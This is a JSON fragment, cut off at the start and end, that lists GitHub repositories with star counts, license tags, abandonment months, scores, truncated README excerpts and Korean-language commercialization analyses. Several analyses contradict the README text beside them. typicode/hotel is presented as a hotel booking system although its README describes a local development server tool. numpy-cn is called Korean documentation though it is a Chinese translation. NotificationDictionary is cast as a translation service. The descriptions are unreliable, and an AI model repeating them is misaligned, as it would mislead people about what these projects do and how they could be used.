|\n|--------|:---------:|:------:|:--","composite_score":0.3189,"license_safety_tag":"safe"},{"name":"Saur0o0n/PIDKiln","github_url":"https://github.com/Saur0o0n/PIDKiln","stars":169,"language":"C++","license":"GPL-2.0","abandonment_months":17,"description":"# PIDKiln 상용화 분석\n\n## 왜 보물인가\n산업용 가마의 온도를 자동으로 조절하는 기술로, 도자기·유리·반도체 제조 등 정밀한 열 관리가 필요한 산업에서 품질 향상과 비용 절감을 동시에 달성할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 도자기·유리 제조업체를 위한 클라우드 기반 가마 모니터링 플랫폼 (월별 구독)\n\n**","readme_excerpt":"# pidkiln\nPIDKiln is PID temperature controller, for any task involving high temperatures - like burning ceramic, glass fusing, soft metal melting, burning lost wax casting forms - and probably much more.\n\n## Key features:\n- Interface accessible both from LCD screen and WWW Webpage\n- Unlimited (limited only by storage) temperature programs number, program file size limited to 10KiB (but this is artificial limit - can be extended)\n- Internal ESP SPIFFS storage for programs, data, logs, configuration (perhaps later SD - but I'm not sure yet)\n- Local preferences on disk, editable with Web interface\n- Online monitoring, program management, editing, graphs and kiln control\n- Build in clock synchronised with NTP servers (if Internet connected)\n- Safety features build in (temperature run out protection, probe failure, SSR failure, kiln insulation failure)\n- Online PIDKiln firmware upgrade with web interface\n- Syslog type, over the network (UDP) logging to remote server\n- ...simply cool and ch","composite_score":0.3188,"license_safety_tag":"restricted"},{"name":"Rick-Lang/rickroll-lang","github_url":"https://github.com/Rick-Lang/rickroll-lang","stars":11,"language":"Python","license":"MIT","abandonment_months":16,"description":"# Rick-Lang/rickroll-lang 분석\n\n## 왜 보물인가\n유명한 인터넷 밈을 프로그래밍 언어로 만들어서 코딩을 재미있고 접근 가능하게 만드는 창의적인 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **교육용 SaaS**: 프로그래밍 입문자를 위한 재미있는 학습 플랫폼으로 운영하며 월 구독료를 받기\n2. **기업 팀빌딩 도구**: 회사 내부 ","readme_excerpt":"\n<img src=\"https://avatars.githubusercontent.com/u/83736946?s=200&v=4\" align=\"right\" width=\"150\" height=\"150\"/>\n<br>\n\n# Rickroll Programming Language\n![License](https://img.shields.io/badge/License-MIT-red?style=for-the-badge&logo=appveyor)\n![Build](https://img.shields.io/badge/Build-passing-green?style=for-the-badge&logo=appveyor)\n![RickRoll PL Community](https://img.shields.io/discord/1071835028251738184?color=red&label=Community%20Chat&style=for-the-badge)\n![Original Server](https://img.shields.io/discord/915760402195959861?color=yellow&label=Original%20Server&style=for-the-badge)\n![Python](https://img.shields.io/badge/Python-3.8%2B-brightgreen?style=for-the-badge&logo=appveyor)\n![Vscode Installs](https://img.shields.io/visual-studio-marketplace/azure-devops/installs/total/FusionSid.rickroll-lang?label=Vscode%20Installs&style=for-the-badge)\n![Vscode Downloads](https://img.shields.io/visual-studio-marketplace/d/FusionSid.rickroll-lang?label=Vscode%20downloads&style=for-the-badge)\n![H","composite_score":0.3187,"license_safety_tag":"safe"},{"name":"typicode/hotel","github_url":"https://github.com/typicode/hotel","stars":6,"language":"JavaScript","license":"mit","abandonment_months":32,"description":"# typicode/hotel 프로젝트 분석\n\n## 왜 보물인가\n호텔 예약 시스템의 기본 기능을 간단하게 구현한 코드로, 숙박업체나 예약 플랫폼이 빠르게 시작할 수 있는 청사진 역할을 합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 호텔을 위한 클라우드 기반 예약 관리 플랫폼으로 월 구독료 수익 창출\n2. **내부 업무 도구**: 호","readme_excerpt":"# hotel [![](https://badge.fury.io/js/hotel.svg)](https://www.npmjs.com/package/hotel)\n\n> Start apps from your browser and use local domains/https automatically\n\n![](https://i.imgur.com/eDLgWMj.png)\n\n_Tip: if you don't enable local domains, hotel can still be used as a **catalog of local servers**._\n\nHotel works great on any OS (macOS, Linux, Windows) and with __all servers :heart:__\n* Node (Express, Webpack)\n* PHP (Laravel, Symfony)\n* Ruby (Rails, Sinatra, Jekyll)\n* Python (Django)\n* Docker\n* Go\n* Apache, Nginx\n* ...\n\n_To all the amazing people who have answered the Hotel survey, thanks so much <3 !_\n\n## v0.8.0 upgrade\n\n`.localhost` replaces `.dev` local domain and is the new default. See https://ma.ttias.be/chrome-force-dev-domains-https-via-preloaded-hsts/ for context.\n\nIf you're upgrading, please be sure to:\n1. Remove `\"tld\": \"dev\"` from your `~/.hotel/conf.json` file\n2. Run `hotel stop && hotel start`\n3. Refresh your network settings\n\n## Support\n\nIf you are benefiting from hotel, ","composite_score":0.3186,"license_safety_tag":"safe"},{"name":"philackm/ScrollableGraphView","github_url":"https://github.com/philackm/ScrollableGraphView","stars":5,"language":"Swift","license":"mit","abandonment_months":67,"description":"# ScrollableGraphView 분석 보고서\n\n## 왜 보물인가\n스마트폰 앱에서 시간에 따른 데이터 변화를 부드럽게 스크롤하며 볼 수 있는 그래프 기능으로, 주식·건강·판매량 같은 추이를 시각화하는 데 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n1. **건강 관리 SaaS**: 운동량, 칼로리, 수면 시간 등을 일주일 단위로 스크롤하며 추적하는 피트","readme_excerpt":"# ScrollableGraphView\n\n## Announcements\n\n### 9-7-2017 - Version 4: \n\nVersion 4 was released which adds multiple plots, dynamic reloading of values, more reference line customisation options and various bug fixes. \n\nYou can see the major changes in the API [here](APIv4.md).\n\nThe public interface is incompatible with previous versions. If you prefer to keep using the older version, make sure to specify version 3 in your podfile or downloaded the classes from a pre-v4 release.\n\n## About\n\n![Example Application Usage](readme_images/IMG_5814_small.jpg)\n\nAn adaptive scrollable graph view for iOS to visualise simple discrete datasets. Written in Swift. Originally written for a small personal project.\n\nThe main goal of the this graph component is to visualise simple discrete datasets and allow the the user to scroll through the graph.\n\n![Init Animation](readme_images/init_anim_high_fps.gif)\n\n### Contribution\n\nAll pull requests are welcome. There is a list of features people would like on the is","composite_score":0.3186,"license_safety_tag":"safe"},{"name":"dvajs/dva","github_url":"https://github.com/dvajs/dva","stars":6,"language":"JavaScript","license":"mit","abandonment_months":10,"description":"# DVA 저장소 분석\n\n## 왜 보물인가\n웹 애플리케이션의 데이터 흐름을 간단하게 관리해주는 도구로, 복잡한 프로젝트를 더 빠르고 안정적으로 만들 수 있게 돕습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 관리 시스템, 프로젝트 관리 도구 등 대규모 웹 기반 서비스의 안정성을 높이기 위한 기술로 활용\n- **내부 업무 도구**: 기업","readme_excerpt":"English | [简体中文](./README_zh-CN.md)\n\n# dva\n\n[![codecov](https://codecov.io/gh/dvajs/dva/branch/master/graph/badge.svg)](https://codecov.io/gh/dvajs/dva)\n[![CircleCI](https://circleci.com/gh/dvajs/dva.svg?style=svg)](https://circleci.com/gh/dvajs/dva)\n[![NPM version](https://img.shields.io/npm/v/dva.svg?style=flat)](https://npmjs.org/package/dva)\n[![Build Status](https://img.shields.io/travis/dvajs/dva.svg?style=flat)](https://travis-ci.org/dvajs/dva)\n[![Coverage Status](https://img.shields.io/coveralls/dvajs/dva.svg?style=flat)](https://coveralls.io/r/dvajs/dva)\n[![NPM downloads](http://img.shields.io/npm/dm/dva.svg?style=flat)](https://npmjs.org/package/dva)\n[![Dependencies](https://david-dm.org/dvajs/dva/status.svg)](https://david-dm.org/dvajs/dva)\n[![Join the chat at https://gitter.im/dvajs/Lobby](https://img.shields.io/gitter/room/dvajs/Lobby.svg?style=flat)](https://gitter.im/dvajs/Lobby?utm_source=share-link&utm_medium=link&utm_campaign=share-link)\n\nLightweight front-end framewor","composite_score":0.3186,"license_safety_tag":"safe"},{"name":"teadocs/numpy-cn","github_url":"https://github.com/teadocs/numpy-cn","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":32,"description":"# teadocs/numpy-cn 분석 보고서\n\n## 왜 보물인가\n복잡한 수학 계산을 쉽게 하도록 도와주는 프로그래밍 도구의 한국어 설명서로, 데이터 분석이나 인공지능을 배우려는 한국인들에게 필수적인 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 온라인 데이터 분석 플랫폼에서 초보자용 한국어 튜토리얼을 제공하는 부가 기능\n- **","readme_excerpt":"# NumPy 中文文档\n\n<p align=\"center\">\n    <img width=\"200\" height=\"200\" src=\"./_logo/logo.png\" alt=\"numpy中文文档logo\" />\n</p>\n\n> Chinese (zh-cn) translation of the NumPy docs\n> \n> numpy官方文档的中文版本\n\n当前版本 ``v1.17`` 。\n\n更多信息请直接访问网站：[https://www.numpy.org.cn/](https://www.numpy.org.cn/)\n\n## 版权信息\n\n除非额外说明，本网站的所有公开文档均遵循 [署名-非商业性使用-相同方式共享 3.0 中国大陆 (CC BY-NC-SA 3.0 CN)](https://creativecommons.org/licenses/by-nc-sa/3.0/cn/) 许可协议。任何人都可以自由地分享、修改本作品，但必须遵循如下条件：\n\n- 署名：必须提到原作者，提供指向此许可协议的链接，表明是否有做修改\n- 非商业性使用：不能对本作品进行任何形式的商业性使用\n- 相同方式共享：若对本作品进行了修改，必须以相同的许可协议共享\n","composite_score":0.3185,"license_safety_tag":"unknown"},{"name":"mellow-io/mellow","github_url":"https://github.com/mellow-io/mellow","stars":12,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# Mellow 프로젝트 분석\n\n## 왜 보물인가\n정보가 부족하여 프로젝트의 핵심 가치를 판단하기 어렵지만, 12개의 스타와 최근 활동(2022년 12월)으로 볼 때 특정 문제를 해결하는 도구로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 설명 정보 부재로 구체적 용도 제시 불가능\n2. **내부 업무 도구**: 팀 협업이나 데이터 처","readme_excerpt":"# Mellow\n\n# 此项目已不维护。Windows 用户全局流量代理推荐尝试：https://github.com/YtFlow/Maple\n\n[![Build Status](https://travis-ci.com/mellow-io/mellow.svg?branch=master)](https://travis-ci.com/mellow-io/mellow)\n\n一个代理功能上类似于 Proxifier 的，可以代理所有流量的，可以使用域名、IP、GEOIP、进程等规则分流的，可以同时有多个协议和出口的工具。\n\n[详细说明](https://github.com/mellow-io/mellow/blob/master/README.1.md)\n\n[核心源码](https://github.com/mellow-io/go-tun2socks)\n","composite_score":0.3184,"license_safety_tag":"unknown"},{"name":"ReactiveX/RxKotlin","github_url":"https://github.com/ReactiveX/RxKotlin","stars":10,"language":"Kotlin","license":"apache-2.0","abandonment_months":32,"description":"# RxKotlin 상용화 분석\n\n## 왜 보물인가\n복잡한 데이터 흐름을 간단하게 처리할 수 있는 도구로, 모바일 앱이나 웹 서비스에서 반응형 기능을 빠르게 구현할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 데이터 처리 SaaS**: 주식 시세, 날씨, 스포츠 경기 결과 등을 실시간으로 업데이트하는 구독형 서비스\n2. **내부 업무 도구","readme_excerpt":"# RxKotlin\n\n[![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxkotlin/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.reactivex.rxjava3/rxkotlin)\n\n## Kotlin Extensions for RxJava\n\nRxKotlin is a lightweight library that adds convenient extension functions to [RxJava](https://github.com/ReactiveX/RxJava). You can use RxJava with Kotlin out-of-the-box, but Kotlin has language features (such as [extension functions](https://kotlinlang.org/docs/reference/extensions.html)) that can streamline usage of RxJava even more. RxKotlin aims to conservatively collect these conveniences in one centralized library, and standardize conventions for using RxJava with Kotlin. \n\n\n```kotlin\nimport io.reactivex.rxjava3.kotlin.subscribeBy\nimport io.reactivex.rxjava3.kotlin.toObservable\n\nfun main() {\n\n    val list = listOf(\"Alpha\", \"Beta\", \"Gamma\", \"Delta\", \"Epsilon\")\n\n    list.toObservable() // extension function for Iterables\n            .filter { it.leng","composite_score":0.3184,"license_safety_tag":"safe"},{"name":"OpenPatchLab/polymarket-weather-trading-bot","github_url":"https://github.com/OpenPatchLab/polymarket-weather-trading-bot","stars":148,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.3184,"license_safety_tag":"safe"},{"name":"async-labs/saas","github_url":"https://github.com/async-labs/saas","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":14,"description":"# async-labs/saas 분석 보고서\n\n## 왜 보물인가\n웹 애플리케이션을 빠르게 만들고 팔 수 있도록 도와주는 기초 틀(템플릿)을 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 구독 기반 업무 관리 도구나 협업 플랫폼을 빠르게 출시할 수 있습니다.\n2. **내부 업무 도구**: 회사 직원들만 사용하는 업무 자동화 시스템을 3","readme_excerpt":"![image](https://user-images.githubusercontent.com/26158226/155850630-137ae3be-aa29-487b-a422-e8fb4db634dc.png)\n\nSupport Ukraine: [link](https://bank.gov.ua/en/news/all/natsionalniy-bank-vidkriv-spetsrahunok-dlya-zboru-koshtiv-na-potrebi-armiyi)\n\n\n## SaaS Boilerplate\n\nOpen source web app that saves you many days of work when building your own SaaS product. The boilerplate comes with many basic SaaS features (see [Features](https://github.com/async-labs/saas#features) below) so that you can focus on features that differentiate your product.\n\nIf you want to learn how to build this project from scratch, check out our book: https://builderbook.org/book\n\nThe open source project is located in the `saas` folder. If you purchased our book, codebases for each of the book's chapters are located in the `book` folder.\n\nWe've used this `saas` project to build:\n- [Builder Book](https://builderbook.org) - learn how to build full-stack web apps from scratch\n- [SaaS Boilerplate](https://github.com/asyn","composite_score":0.3182,"license_safety_tag":"safe"},{"name":"oliviertassinari/react-swipeable-views","github_url":"https://github.com/oliviertassinari/react-swipeable-views","stars":6,"language":"JavaScript","license":"MIT","abandonment_months":8,"description":"# react-swipeable-views 분석 리포트\n\n## 왜 보물인가\n스마트폰처럼 손가락으로 쓸어넘기는 방식의 사용자 경험을 웹사이트에 쉽게 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **이미지 갤러리 SaaS**: 사진 관리 서비스에서 사용자가 터치로 이미지를 넘기는 인터페이스 제공\n- **모바일 전자상거래 플랫폼**: 온라인 쇼핑 ","readme_excerpt":"# react-swipeable-views\n\n> A React component for swipeable views.\n\n| Package | Version | Download | Size (kB gzipped) |\n|---------|:--------|:---------|:------------------|\n| react-swipeable-views | [![npm version](https://img.shields.io/npm/v/react-swipeable-views.svg)](https://www.npmjs.com/package/react-swipeable-views) | [![npm downloads](https://img.shields.io/npm/dm/react-swipeable-views.svg)](https://www.npmjs.com/package/react-swipeable-views) | 5.08 |\n| react-swipeable-views-utils | [![npm version](https://img.shields.io/npm/v/react-swipeable-views-utils.svg)](https://www.npmjs.com/package/react-swipeable-views-utils) | [![npm downloads](https://img.shields.io/npm/dm/react-swipeable-views-utils.svg)](https://www.npmjs.com/package/react-swipeable-views-utils) | 3.52 |\n| react-swipeable-views-native | [![npm version](https://img.shields.io/npm/v/react-swipeable-views-native.svg)](https://www.npmjs.com/package/react-swipeable-views-native) | [![npm downloads](https://img.shields.","composite_score":0.3182,"license_safety_tag":"safe"},{"name":"gitpitch/gitpitch","github_url":"https://github.com/gitpitch/gitpitch","stars":11,"language":"Python","license":"mit","abandonment_months":64,"description":"# GitPitch 저장소 분석\n\n## 왜 보물인가\n프레젠테이션 자료를 코드처럼 관리하고 버전 관리할 수 있어서, 팀 협업과 자료 공유가 훨씬 쉬워진다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스로 운영**\n- 기업과 교육 기관을 대상으로 월 구독형 프레젠테이션 제작 플랫폼 제공\n\n**2. 내부 업무 도구로 활용**\n- 회사의 모든 보고서, 제안","readme_excerpt":"> March 1, 2021: Service on **gitpitch.com** has been shutdown permanently.\n\n## GitPitch 4.0\n\n- [Docs](https://gitpitch.github.io/gitpitch)\n- [Twitter](https://twitter.com/gitpitch)\n\n### About\n\n- Watch the [Introducing GitPitch 4.0 Video](https://www.youtube.com/watch?v=MT88pCE291I)\n- Visit the [What's New in GitPitch 4.0 Guide](https://gitpitch.github.io/gitpitch/#/whats-new-in-40)\n- Go directly to the [GitPitch 4.0 Quickstart Guide](https://gitpitch.github.io/gitpitch/#/quickstart)\n\nGitPitch 4.0 is the perfect slide deck solution for tech conferences, training, developer advocates, and educators. Available on MacOS, Linux, and Windows 10. Work and present offline. Export to PDF, PPTX, and HTML. Or git-push to share public, private and password-protected slide decks online.\n\n![GITPITCH](assets/images/gitpitch-40-release.png)\n\n<br>\n\n- GitPitch is a markdown presentation tool for MacOS, Linux, and Windows 10.\n- GitPitch Desktop lets you develop, preview, and present markdown presentatio","composite_score":0.3182,"license_safety_tag":"safe"},{"name":"antoyo/rustc_codegen_gcc","github_url":"https://github.com/antoyo/rustc_codegen_gcc","stars":9,"language":"Rust","license":"Apache-2.0","abandonment_months":16,"description":"# rustc_codegen_gcc 상업화 분석\n\n## 왜 보물인가\n프로그래머들이 다양한 방식으로 코드를 실행할 수 있도록 만들어주는 기술로, 소프트웨어 개발의 기본 인프라 역할을 합니다.\n\n## 어디에 쓸 수 있나\n\n1. **컴파일러 최적화 SaaS**: 기업의 코드를 더 빠르고 효율적으로 변환해주는 클라우드 서비스\n2. **내부 업무 도구**: 개발팀이","readme_excerpt":"# WIP libgccjit codegen backend for rust\n\n[![Chat on IRC](https://img.shields.io/badge/irc.libera.chat-%23rustc__codegen__gcc-blue.svg)](https://web.libera.chat/#rustc_codegen_gcc)\n[![Chat on Matrix](https://img.shields.io/badge/matrix.org-%23rustc__codegen__gcc-blue.svg)](https://matrix.to/#/#rustc_codegen_gcc:matrix.org)\n\nThis is a GCC codegen for rustc, which means it can be loaded by the existing rustc frontend, but benefits from GCC: more architectures are supported and GCC's optimizations are used.\n\n**Despite its name, libgccjit can be used for ahead-of-time compilation, as is used here.**\n\n## Motivation\n\nThe primary goal of this project is to be able to compile Rust code on platforms unsupported by LLVM.\nA secondary goal is to check if using the gcc backend will provide any run-time speed improvement for the programs compiled using rustc.\n\n### Dependencies\n\n**rustup:** Follow the instructions on the official [website](https://www.rust-lang.org/tools/install)\n\n**DejaGnu:** Consid","composite_score":0.3181,"license_safety_tag":"safe"},{"name":"zacyu/bilibili-helper","github_url":"https://github.com/zacyu/bilibili-helper","stars":5,"language":"JavaScript","license":"mit","abandonment_months":60,"description":"# bilibili-helper 보물 평가\n\n## 왜 보물인가\n빌리빌리(중국 최대 동영상 플랫폼)의 번거로운 작업들을 자동으로 처리해주는 도구로, 크리에이터와 일반 사용자의 시간을 크게 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 빌리빌리 크리에이터용 콘텐츠 관리 플랫폼 (업로드, 스케줄링, 분석 자동화)\n2. **내부 업","readme_excerpt":"<h1 align=\"center\">\n  <br>\n  <a href=\"https://bilibili-helper.github.io/\"><img src=\"https://github.com/bilibili-helper/bilibili-helper-o/raw/master/src/statics/imgs/bilibili-cat-256.png\" alt=\"Bilibili Helper\" width=\"100\"></a>\n  <br>\n  Bilibili Helper\n  <br>\n</h1>\n\n[![LICENSE](https://img.shields.io/github/license/bilibili-helper/bilibili-helper-o)](LICENSE)\n[![Build Status](https://img.shields.io/travis/zacyu/bilibili-helper.svg)](https://travis-ci.org/zacyu/bilibili-helper)\n[![Chrome Web Store](https://img.shields.io/chrome-web-store/v/kpbnombpnpcffllnianjibmpadjolanh.svg)](https://chrome.google.com/webstore/detail/kpbnombpnpcffllnianjibmpadjolanh)\n[![Chrome Webstore Downloads](https://img.shields.io/chrome-web-store/d/kpbnombpnpcffllnianjibmpadjolanh.svg)](https://chrome.google.com/webstore/detail/kpbnombpnpcffllnianjibmpadjolanh)\n[![Website](https://img.shields.io/website-up-down-green-red/http/bilibili-helper.github.io.svg)](https://bilibili-helper.github.io/)\n\nCopyright (c) 2018 [","composite_score":0.318,"license_safety_tag":"safe"},{"name":"MisterBooo/ReadyForBAT","github_url":"https://github.com/MisterBooo/ReadyForBAT","stars":15,"language":"Objective-C","license":"unknown","abandonment_months":91,"description":"# ReadyForBAT 분석 보고서\n\n## 왜 보물인가\nBAT(기술 역량 평가) 준비를 체계적으로 돕는 도구로, 기술 직군 채용 과정에서 필요한 준비 자료를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 개발자 구직자를 위한 월 구독형 면접 준비 플랫폼으로 운영\n2. **내부 업무 도구**: 대기업 인사팀이 신입 개발자 평가 기준 ","readme_excerpt":"# iOS面试准备之思维导图 \n\n> 以思维导图的方式对iOS常见的面试题知识点进行梳理复习，[文章xmind点这下载](https://github.com/MisterBooo/ReadyForBAT)，[文章图片太大查看不了也点这下载](https://github.com/MisterBooo/ReadyForBAT)\n\n> 你可以在公众号 **五分钟学算法** 获取数据结构与算法相关的内容，准备算法面试\n\n> 公众号回复 **github** 获取十大经典排序动画。\n\n\n# 目录  \n1.UI视图相关面试问题  \n2.Objective-C语言特性相关面试问题  \n3.Runtime相关面试问题  \n4.内存管理相关面试问题  \n5.Block相关面试问题  \n6.多线程相关面试问题  \n7.RunLoop相关面试问题  \n8.网络相关面试问题  \n9.设计模式相关面试问题  \n10.架构/框架相关面试问题  \n11.算法相关面试问题   \n12.第三方库相关面试问题   \n13.性能优化相关面试问题   \n14.音视频相关面试问题   \n15.核心动画相关面试问题  \n\n## 1.UI视图相关面试问题思维导图\n![](https://bucket-1257126549.cos.ap-guangzhou.myqcloud.com/20181205170827.png)\n## 2.Objective-C语言特性相关面试问题 \n![](https://bucket-1257126549.cos.ap-guangzhou.myqcloud.com/20181205171159.png)\n## 3.Runtime相关面试问题思维导图 \n![](https://bucket-1257126549.cos.ap-guangzhou.myqcloud.com/20181205172201.png)\n## 4.内存管理相关面试问题思维导图  \n![](https://bucket-1257126549.cos.ap-guangzhou.myqcloud.com/20181205171652.png)\n## 5.Block相关面试问题思维导图 \n![](https://bucket-1257126549.cos.ap-guangzhou.myqcloud.com/20181","composite_score":0.3179,"license_safety_tag":"unknown"},{"name":"tirkarthi/NotificationDictionary","github_url":"https://github.com/tirkarthi/NotificationDictionary","stars":5,"language":"Kotlin","license":"MIT","abandonment_months":16,"description":"# NotificationDictionary 상용화 분석\n\n## 왜 보물인가\n앱이나 웹사이트가 사용자에게 보내는 알림 메시지를 여러 언어로 자동 변환해주는 도구로, 글로벌 서비스 운영 시 번역 비용과 시간을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 알림 메시지 자동 번역 SaaS**\n- 초기 스타트업부터 대기업까지 모든 서비스가 ","readme_excerpt":"# Notification Dictionary\n\nAn Android application to display meaning of selected word as a notification.\n\n\n[<img src=\"https://fdroid.gitlab.io/artwork/badge/get-it-on.png\"\n     alt=\"Get it on F-Droid\"\n     height=\"80\">](https://f-droid.org/packages/com.xtreak.notificationdictionary/)\n[<img src=\"https://play.google.com/intl/en_us/badges/images/generic/en-play-badge.png\"\n     alt=\"Get it on Google Play\"\n     height=\"80\">](https://play.google.com/store/apps/details?id=com.xtreak.notificationdictionary)\n\n## Features\n\n- Easy access from all apps that have text selection.\n- Enabled for offline usage.\n- Wide variety of meanings from Wikitionary.\n- Open source and MIT License.\n\n# Database and github size limitation\n\n- GitHub blocks files with size larger than 100MB.\n- Create directory app/src/main/assets/databases/.\n- Uncompress database.tar.gz available at root and move it to asset folder.\n\n## Credits\n\n- Wikitionary : https://www.wiktionary.org/\n- Wikitionary parser : https://github.com/macdu","composite_score":0.3178,"license_safety_tag":"safe"},{"name":"google/tangent","github_url":"https://github.com/google/tangent","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":44,"description":"# Google Tangent 저장소 분석\n\n## 왜 보물인가\nGoogle이 개발한 자동 미분 기술로, 복잡한 수학 계산을 컴퓨터가 자동으로 처리하게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **AI 모델 개발 플랫폼**: 인공지능 학습 시간을 단축하는 SaaS 서비스로 제공\n2. **금융 회사 내부 도구**: 복잡한 위험도 계산을 자동화하는 업","readme_excerpt":"# Tangent \n\n[![Build Status](https://travis-ci.org/google/tangent.svg?branch=master)](https://travis-ci.org/google/tangent)\n[![Join the chat at https://gitter.im/google/tangent](https://badges.gitter.im/google/tangent.svg)](https://gitter.im/google/tangent?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n\nTangent is a new, free, and open-source Python library for automatic differentiation.  \n\n\nExisting libraries implement automatic differentiation by tracing a program's execution (at runtime, like PyTorch) or by staging out a dynamic data-flow graph and then differentiating the graph (ahead-of-time, like TensorFlow). In contrast, Tangent performs ahead-of-time autodiff on the Python source code itself, and produces Python source code as its output. Tangent fills a unique location in the space of machine learning tools.\n\n![Autodiff Tool Space](docs/toolspace.png \"Autodiff Tool Space\")\n\n\nAs a result, you can finally read your automatic derivative code just like ","composite_score":0.3174,"license_safety_tag":"safe"},{"name":"Nealyang/React-Express-Blog-Demo","github_url":"https://github.com/Nealyang/React-Express-Blog-Demo","stars":5,"language":"JavaScript","license":"unknown","abandonment_months":42,"description":"# React-Express-Blog-Demo 분석\n\n## 왜 보물인가\n블로그 웹사이트를 만드는 데 필요한 기본 틀이 완성되어 있어서, 처음부터 끝까지 직접 만드는 수고를 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **개인 블로그 플랫폼 SaaS**: 누구나 클릭만으로 자신의 블로그를 만들 수 있는 구독형 서비스 (Wix, Medium 같은","readme_excerpt":"# React技术栈+Express+Mongodb实现个人博客\n\n> 该项目暂停维护，欢迎关注后续开源的个人网站\n\n## 说明\n\n***放到开头，这里重点说明下，很多哥们会发邮件群里艾特，但是好多邮件回复不了不知道什么情况，群里有时候不怎么关注就错过了，大家如果有啥问题咱就直接提issue吧，后面朋友遇到相同问题大家也可以参考***\n\n### 微信公众号\n\n![img](https://github.com/Nealyang/PersonalBlog/blob/master/img/wx.jpg)\n\n> 扫码关注微信公众号，获取第一手文章推送\n\n## 功能描述\n\n***前端部分***\n\n- [x] 文章列表展示\n- [x] 文章分类\n- [x] 登录管理\n- [x] 权限管理\n- [x] 文章详情页展示\n- [x] 管理员文章管理\n- [x] 管理员标签管理\n- [x] 发文（支持MarkDown语法）\n\n***后端部分***\n- [x] mongoose数据库操作\n- [x] 路由管理\n- [x] 身份验证\n- [x] 基本的增删改查\n- [x] ...\n\n## 技术栈\n- [x] react\n- [x] react-redux\n- [x] react-router\n- [x] redux-saga\n- [x] babel\n- [x] webpack\n- [x] Express\n- [x] Mongodb\n- [x] Mongoose\n\n## TODO\n\n- 文章评论 \n\n\n## 项目运行效果\n- 首页\n![index](./record/2017-09-28%2010_25_45.gif)\n\n- 非管理员登录\n\n![nealyanglogined](./record/nealyangLogined.gif)\n\n- 管理员登录\n\n![adminLogined](./record/adminLogined.gif)\n\n- 标签管理\n\n![amdinTag](./record/adminTag.gif)\n\n- 查看文章详情\n![detail](./record/checkArticleDetail.gif)\n\n- 发表文章\n![newArticle](./record/new_article.gif)\n\n- 修改文章\n![modifiedArticle](./rec","composite_score":0.3174,"license_safety_tag":"unknown"},{"name":"react-ga/react-ga","github_url":"https://github.com/react-ga/react-ga","stars":6,"language":"JavaScript","license":"NOASSERTION","abandonment_months":41,"description":"# react-ga 저장소 분석\n\n## 왜 보물인가\n웹사이트 방문자의 행동을 자동으로 기록하고 분석할 수 있는 도구로, 비즈니스 의사결정에 필요한 핵심 데이터를 쉽게 수집할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 웹 기반 협업 도구나 클라우드 서비스에서 사용자가 어떤 기능을 자주 사용하는지 추적하여 제품 개선에 활용\n2. ","readme_excerpt":"# react-ga\n\n### React Google Analytics Module\n\n[![Build Status](https://img.shields.io/travis/react-ga/react-ga/master.svg?style=flat-square)](https://travis-ci.org/react-ga/react-ga)\n[![npm version](https://img.shields.io/npm/v/react-ga.svg?style=flat-square)](https://www.npmjs.com/package/react-ga)\n[![npm downloads](https://img.shields.io/npm/dm/react-ga.svg?style=flat-square)](https://www.npmjs.com/package/react-ga)\n\nThis is a JavaScript module that can be used to include Google Analytics tracking code in a website or app that uses [React](https://facebook.github.io/react/) for its front-end codebase. It does not currently use any React code internally, but has been written for use with a number of Mozilla Foundation websites that are using React, as a way to standardize our GA Instrumentation across projects.\n\nIt is designed to work with [Universal Analytics](https://support.google.com/analytics/answer/2790010) and will not support the older `ga.js` implementation.\n\nThis module is ","composite_score":0.3174,"license_safety_tag":"unknown"},{"name":"nielsenramon/chalk","github_url":"https://github.com/nielsenramon/chalk","stars":5,"language":"CSS","license":"mit","abandonment_months":26,"description":"# Chalk 저장소 분석\n\n## 왜 보물인가\n웹사이트나 블로그를 깔끔하고 예쁘게 꾸밀 수 있는 디자인 틀이 무료로 제공되는 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **기술 블로그 SaaS**: 개발자들이 자신의 포트폴리오나 기술 블로그를 쉽게 만들 수 있는 구독형 서비스\n2. **스타트업 홈페이지 제작 도구**: 코딩 없이도 전문가 수준의 웹사이","readme_excerpt":"![](_assets/images/documentation/chalk-intro@2x.png)\n\nChalk is a high quality, completely customizable, performant and 100% free blog template for Jekyll.\n\n## Overview\n\nFeatures:\n  - About page.\n  - Automatic RSS feed.\n  - Automatic sitemap.\n  - Automatic time to read post indicator.\n  - Cross browser support (supports all modern browsers).\n  - Custom 404 page.\n  - Custom code highlighting.\n  - Customizable pagination.\n  - Dark and Light theme.\n  - Easy setup and deploying.\n  - Enlarge images on click.\n  - Filter on tags.\n  - Optional tag navigation.\n  - Frequently updated with new versions.\n  - Many social media links supported.\n  - Media embed for videos.\n  - PageSpeed optimized.\n  - Proper sharing links for posts on Facebook, Twitter and Google Plus.\n  - SEO optimized.\n  - Support for local fonts.\n  - Support for emoji's.\n\nIntegrations\n  - [Disqus](https://disqus.com/)\n  - [Google 